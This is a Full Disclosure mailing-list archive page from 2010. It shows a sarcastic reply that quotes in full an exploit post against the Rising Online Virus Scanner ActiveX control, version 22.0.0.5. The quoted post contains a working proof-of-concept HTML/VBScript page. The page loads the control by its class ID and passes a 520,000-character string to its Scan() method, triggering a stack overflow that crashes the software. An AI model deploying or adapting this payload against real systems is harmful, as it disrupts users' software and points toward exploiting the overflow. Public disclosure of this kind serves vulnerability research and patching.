Full Disclosure mailing list archives
Re: Rising Online Virus Scanner ActiveX Control DoS (Stack overflow)
From: Benji <me () b3nji com>
Date: Wed, 17 Feb 2010 16:02:53 +0000
Dude you are such a rebel."# Because Bullshit like this is unsaleable and i don't want to waste time
# coordinating patches with this vendor this is a fulldisc publishing."
Sent from my iPhoneOn 17 Feb 2010, at 15:46, wirebonder 42 <wirebonder42 () googlemail com> wrote:
# Exploit Title: Rising Online Virus Scanner ActiveX Control DoS (Stack overflow)# Date: 17/02/2010 # Author: wirebonder # Software Link: http://www.rising-global.com/products/online-scanner-intro.html # Version: 22.0.0.5 # Tested on: Windows XP sp3 # CVE : n/a # Code : ## # ProgID: RavOLCtlLib.RavOnline # ClassID: 9FAFB576-6933-4CCC-AB3D-B988EC43D04E # Member: Scan() # File: C:\Programme\Rising\RavOL\RavOLCtl.dll # script safe: true # init safe: true ## Because Bullshit like this is unsaleable and i don't want to waste time# coordinating patches with this vendor this is a fulldisc publishing. ## <html> <body><object classid='clsid:9FAFB576-6933-4CCC-AB3D-B988EC43D04E' id='obj'></object><script language='vbscript'> buf=String(520000, "A") obj.Scan buf </script> </body> </html> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Rising Online Virus Scanner ActiveX Control DoS (Stack overflow) wirebonder 42 (Feb 17)
- Re: Rising Online Virus Scanner ActiveX Control DoS (Stack overflow) Benji (Feb 17)